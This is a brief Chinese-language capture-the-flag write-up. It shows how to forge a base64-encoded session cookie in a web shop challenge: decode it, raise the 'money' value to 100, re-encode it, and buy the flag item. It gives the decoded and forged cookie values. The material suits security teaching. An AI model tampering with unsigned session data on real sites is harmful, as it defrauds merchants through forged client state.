知识点:session伪造+base64编码
我们抓包会发现
session会是一个base64编码,解密后
eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ==
{"money": 50, "history": []}
而我们买第一个的时候,id会显0,买第二个的时候,id会显示1,那不难猜出第三个flag的id为2
所以我们只要构造
{"money": 100, "history": []}
然后base64加密一下就可以了。
eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbXX0=
最后把响应头的session给base64解码一下就可以了
